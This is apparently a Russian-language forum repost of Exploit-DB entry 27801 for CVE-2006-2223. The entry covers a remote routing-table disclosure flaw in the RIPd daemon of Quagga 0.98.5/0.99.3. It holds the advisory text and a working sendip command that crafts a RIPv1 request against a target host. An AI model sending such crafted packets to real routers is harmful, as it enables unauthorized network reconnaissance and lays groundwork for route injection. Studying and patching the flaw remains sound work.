Exploit Quagga Routing Software Suite 0.9x - RIPd RIPv1 Request Routing Table Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
27801
Проверка EDB
  1. Пройдено
Автор
KONSTANTIN V. GAVRILENKO
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2006-2223
Дата публикации
2006-05-03
Код:
source: https://www.securityfocus.com/bid/17808/info

Quagga is susceptible to remote information-disclosure and route-injection vulnerabilities. The application fails to properly ensure that required authentication and protocol configuration options are enforced.

These issues allow remote attackers to gain access to potentially sensitive network-routing configuration information and to inject arbitrary routes into the RIP routing table. This may aid malicious users in further attacks against targeted networks.

Quagga versions 0.98.5 and 0.99.3 are vulnerable to these issues; other versions may also be affected.

sendip -p ipv4 -is 192.168.66.102 -p udp -us 520 -ud 520 -p rip -rv 1 -rc 1 -re 0:0:0:0:0:16 192.168.66.111
 
Источник
www.exploit-db.com

Похожие темы